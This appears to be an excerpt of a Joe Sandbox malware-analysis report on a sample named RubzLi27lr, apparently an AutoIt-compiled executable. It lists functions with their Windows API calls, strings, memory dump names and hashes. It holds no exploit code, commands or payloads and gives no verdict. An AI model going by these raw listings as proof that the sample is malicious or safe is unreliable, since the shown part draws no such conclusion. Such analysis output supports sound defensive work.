                                                                                                                  Function 00B24ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B24AED
                                                                                                                  • GetDriveTypeW.KERNEL32(?,00B4CB68,?,\\.\,00B4CC08), ref: 00B24BCA
                                                                                                                  • SetErrorMode.KERNEL32(00000000,00B4CB68,?,\\.\,00B4CC08), ref: 00B24D36
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                  • Opcode ID: 69a88f82c0883b35494b0fdd081f78e1c783b91a6263f485f83f785798347e74
                                                                                                                  • Instruction ID: a63b8c332f498feea6bd062facf5f036792786f48f50daddecce3efcad4df4ed
                                                                                                                  • Opcode Fuzzy Hash: 69a88f82c0883b35494b0fdd081f78e1c783b91a6263f485f83f785798347e74
                                                                                                                  • Instruction Fuzzy Hash: 4F61D330605615AFCB15DF28EAC2DAD77F0EB05340B2080E6F81EABAA2DB31DD41DB41
                                                                                                                  Function 00B473E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00B47421
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00B47425
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B4743B
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00B47446
                                                                                                                  • CreateSolidBrush.GDI32(?), ref: 00B4744B
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00B47463
                                                                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B47471
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00B47482
                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00B4748B
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00B47498
                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B474B7
                                                                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B474CE
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B474DB
                                                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B4752A
                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B47554
                                                                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00B47572
                                                                                                                  • DrawFocusRect.USER32(?,?), ref: 00B4757D
                                                                                                                  • GetSysColor.USER32(00000011), ref: 00B4758E
                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00B47596
                                                                                                                  • DrawTextW.USER32(?,00B470F5,000000FF,?,00000000), ref: 00B475A8
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00B475BF
                                                                                                                  • DeleteObject.GDI32(?), ref: 00B475CA
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00B475D0
                                                                                                                  • DeleteObject.GDI32(?), ref: 00B475D5
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00B475DB
                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00B475E5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1996641542-0
                                                                                                                  • Opcode ID: 7b203ab22d9fd00a8d861f104f230bdb7244d91825ab748e5dda49d83e687b0d
                                                                                                                  • Instruction ID: 9fa062cdff53d55686512ce21435ae2c3fa6669276feeecfde3dc19a15b54e24
                                                                                                                  • Opcode Fuzzy Hash: 7b203ab22d9fd00a8d861f104f230bdb7244d91825ab748e5dda49d83e687b0d
                                                                                                                  • Instruction Fuzzy Hash: 3D619A76901218AFDF009FA4DC49EAEBFB9FB09720F114155F911BB2A1DB709A40DF90
                                                                                                                  Function 00B40FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B41128
                                                                                                                  • GetDesktopWindow.USER32 ref: 00B4113D
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00B41144
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B41199
                                                                                                                  • DestroyWindow.USER32(?), ref: 00B411B9
                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B411ED
                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B4120B
                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B4121D
                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00B41232
                                                                                                                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00B41245
                                                                                                                  • IsWindowVisible.USER32(00000000), ref: 00B412A1
                                                                                                                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00B412BC
                                                                                                                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00B412D0
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B412E8
                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00B4130E
                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00B41328
                                                                                                                  • CopyRect.USER32(?,?), ref: 00B4133F
                                                                                                                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 00B413AA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                  • Opcode ID: 3e91838ab177ae9a8475069c7a419fd07954c3993aaa35617e5d11bc37fb798b
                                                                                                                  • Instruction ID: 88ea4c45949602ff9f9651811258dee732c502b6d85b113ed827d63a87dd7d3c
                                                                                                                  • Opcode Fuzzy Hash: 3e91838ab177ae9a8475069c7a419fd07954c3993aaa35617e5d11bc37fb798b
                                                                                                                  • Instruction Fuzzy Hash: DEB1AF71A04341AFD710DF68C984BAEBBE4FF84700F008958F9999B261CB71DD44DB62
                                                                                                                  Function 00B40241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00B402E5
                                                                                                                  • _wcslen.LIBCMT ref: 00B4031F
                                                                                                                  • _wcslen.LIBCMT ref: 00B40389
                                                                                                                  • _wcslen.LIBCMT ref: 00B403F1
                                                                                                                  • _wcslen.LIBCMT ref: 00B40475
                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B404C5
                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B40504
                                                                                                                    • Part of subcall function 00ACF9F2: _wcslen.LIBCMT ref: 00ACF9FD
                                                                                                                    • Part of subcall function 00B1223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B12258
                                                                                                                    • Part of subcall function 00B1223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B1228A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                  • API String ID: 1103490817-719923060
                                                                                                                  • Opcode ID: e9e942767cb74dcd4604262e5e726b937789332edbda8cbb58a17f58ab25bb7a
                                                                                                                  • Instruction ID: 9e4182f471af50e514890210712fe708e074e33fea53565233136723c3513c60
                                                                                                                  • Opcode Fuzzy Hash: e9e942767cb74dcd4604262e5e726b937789332edbda8cbb58a17f58ab25bb7a
                                                                                                                  • Instruction Fuzzy Hash: 96E1E1312282018FC714EF24C59096AB7E6FFD8314F15899CF9969B3A2DB30EE45DB42
                                                                                                                  Function 00AC8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AC8968
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00AC8970
                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00AC899B
                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00AC89A3
                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00AC89C8
                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00AC89E5
                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00AC89F5
                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00AC8A28
                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00AC8A3C
                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00AC8A5A
                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00AC8A76
                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AC8A81
                                                                                                                    • Part of subcall function 00AC912D: GetCursorPos.USER32(?), ref: 00AC9141
                                                                                                                    • Part of subcall function 00AC912D: ScreenToClient.USER32(00000000,?), ref: 00AC915E
                                                                                                                    • Part of subcall function 00AC912D: GetAsyncKeyState.USER32(00000001), ref: 00AC9183
                                                                                                                    • Part of subcall function 00AC912D: GetAsyncKeyState.USER32(00000002), ref: 00AC919D
                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00AC90FC), ref: 00AC8AA8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                  • Opcode ID: aea06f0018f03e56d1d593fcab2860c09f63551b65c77fb2de0b7b8eacf053a5
                                                                                                                  • Instruction ID: b1de9190a74412c392b2cabcb0de05b7fe0ed4d93de5af4ce0915bc979d48fe3
                                                                                                                  • Opcode Fuzzy Hash: aea06f0018f03e56d1d593fcab2860c09f63551b65c77fb2de0b7b8eacf053a5
                                                                                                                  • Instruction Fuzzy Hash: 17B18C35A01209AFDB14DFA8CC46FAE3BB5FB48714F114269FA15AB2A0DB34E941CB51
                                                                                                                  Function 00B10D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B11114
                                                                                                                    • Part of subcall function 00B110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11120
                                                                                                                    • Part of subcall function 00B110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B1112F
                                                                                                                    • Part of subcall function 00B110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B10B9B,?,?,?), ref: 00B11136
                                                                                                                    • Part of subcall function 00B110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B1114D
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B10DF5
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B10E29
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00B10E40
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00B10E7A
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B10E96
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00B10EAD
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B10EB5
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00B10EBC
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B10EDD
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00B10EE4
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B10F13
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B10F35
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B10F47
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10F6E
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B10F75
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10F7E
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B10F85
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B10F8E
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B10F95
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B10FA1
                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00B10FA8
                                                                                                                    • Part of subcall function 00B11193: GetProcessHeap.KERNEL32(00000008,00B10BB1,?,00000000,?,00B10BB1,?), ref: 00B111A1
                                                                                                                    • Part of subcall function 00B11193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B10BB1,?), ref: 00B111A8
                                                                                                                    • Part of subcall function 00B11193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B10BB1,?), ref: 00B111B7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4175595110-0
                                                                                                                  • Opcode ID: 3dfa5827f1f22dd635d4de4c2b34365f0f280cbe64c138ac1607e66ddd012869
                                                                                                                  • Instruction ID: 21b619e36c59579fd32980354efc534a9ff5fd48221f5f85b5b781d258aaf6a5
                                                                                                                  • Opcode Fuzzy Hash: 3dfa5827f1f22dd635d4de4c2b34365f0f280cbe64c138ac1607e66ddd012869
                                                                                                                  • Instruction Fuzzy Hash: B371AF7290120AEBDF20AFA4DC45FEEBBB8FF06700F144155F958A7290DB709A85CB60
                                                                                                                  Function 00B3C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B3C4BD
                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B4CC08,00000000,?,00000000,?,?), ref: 00B3C544
                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00B3C5A4
                                                                                                                  • _wcslen.LIBCMT ref: 00B3C5F4
                                                                                                                  • _wcslen.LIBCMT ref: 00B3C66F
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00B3C6B2
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00B3C7C1
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00B3C84D
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B3C881
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3C88E
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00B3C960
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                  • API String ID: 9721498-966354055
                                                                                                                  • Opcode ID: 53b27f7aaad6a705b2a0c6bdb4558741c8cf9d544e11f65bd8f1ffd7ac08ad89
                                                                                                                  • Instruction ID: 0c22f8ea72d99e5209ae3a8ed59e26912a717cda1158995c84a03e4f5321cf01
                                                                                                                  • Opcode Fuzzy Hash: 53b27f7aaad6a705b2a0c6bdb4558741c8cf9d544e11f65bd8f1ffd7ac08ad89
                                                                                                                  • Instruction Fuzzy Hash: 3B1269352042009FD714DF24C981A6ABBE5FF88714F14899DF89AAB3A2DB31FD41CB91
                                                                                                                  Function 00B4091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00B409C6
                                                                                                                  • _wcslen.LIBCMT ref: 00B40A01
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B40A54
                                                                                                                  • _wcslen.LIBCMT ref: 00B40A8A
                                                                                                                  • _wcslen.LIBCMT ref: 00B40B06
                                                                                                                  • _wcslen.LIBCMT ref: 00B40B81
                                                                                                                    • Part of subcall function 00ACF9F2: _wcslen.LIBCMT ref: 00ACF9FD
                                                                                                                    • Part of subcall function 00B12BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B12BFA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                  • API String ID: 1103490817-4258414348
                                                                                                                  • Opcode ID: d62dd70aae74e51a168b75fcfda05d51bcf9f12349c2ad65717ca13595b61c04
                                                                                                                  • Instruction ID: a8dfeb21df55331342e5feefe70e552e412f14c5c0dc400fe2fc7dc043339b6e
                                                                                                                  • Opcode Fuzzy Hash: d62dd70aae74e51a168b75fcfda05d51bcf9f12349c2ad65717ca13595b61c04
                                                                                                                  • Instruction Fuzzy Hash: AAE1AF312183018FC714EF24C59196AB7E1FF98314F1589ADF9AA9B362DB30EE45DB81
                                                                                                                  Function 00B3C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                  • API String ID: 1256254125-909552448
                                                                                                                  • Opcode ID: efe81f874983a8a4e67d778cbc50898bb59414bb0e50f474cb4d5369caa205fc
                                                                                                                  • Instruction ID: dc5e986438594100383b83698f7d7e52ba65f22475e69b90400084d94cdbe87e
                                                                                                                  • Opcode Fuzzy Hash: efe81f874983a8a4e67d778cbc50898bb59414bb0e50f474cb4d5369caa205fc
                                                                                                                  • Instruction Fuzzy Hash: 3871E33360012A8BCB20DEBCCD515BA3BD5EB60754F3545A9F86AB7289FA31CD45C3A0
                                                                                                                  Function 00B4833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00B4835A
                                                                                                                  • _wcslen.LIBCMT ref: 00B4836E
                                                                                                                  • _wcslen.LIBCMT ref: 00B48391
                                                                                                                  • _wcslen.LIBCMT ref: 00B483B4
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B483F2
                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B45BF2), ref: 00B4844E
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B48487
                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B484CA
                                                                                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B48501
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00B4850D
                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B4851D
                                                                                                                  • DestroyIcon.USER32(?,?,?,?,?,00B45BF2), ref: 00B4852C
                                                                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B48549
                                                                                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B48555
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
